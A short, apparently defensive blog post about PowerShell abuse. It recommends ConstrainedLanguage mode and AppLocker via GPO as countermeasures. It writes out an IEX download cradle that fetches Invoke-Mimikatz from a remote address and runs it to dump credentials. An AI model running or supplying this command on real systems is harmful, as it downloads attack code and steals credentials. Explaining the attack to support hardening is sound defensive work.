As we know PowerShell can be much more than a scripting platform, when it comes to administrative rights.
Running unsigned process and scripts will serve the attacker to advance another step in to achieve the objective.
Mimikatz and other painful tools detected by Antiviruses and Antimalware spot, but when they bypass , we are expose to one of the suspicious attacks in PowerShell today.
Using IEX cradle to get new file – is one of them,
Simply upload the PS script and run the following:
“IEX (New-Object Net.WebClient).DownloadString(‘https://192.168.1.1/Invoke-Mimikatz.ps1’);Invoke-Mimikatz -DumpCreds”
PowerShell can limit access to above command by using Language Mode
FullLanguage – permits all language elements in the session:
ConstrainedLanguage – permits all Windows cmdlets and all PowerShell language elements, but it limits permitted types: Direct .Net Scripting, Win32 API via Add-Type, Interaction with COM Objects.
It’s High Recommended to hardening the above with AppLocker Control Policy Via GPO to prevent from Local Administrators any changes.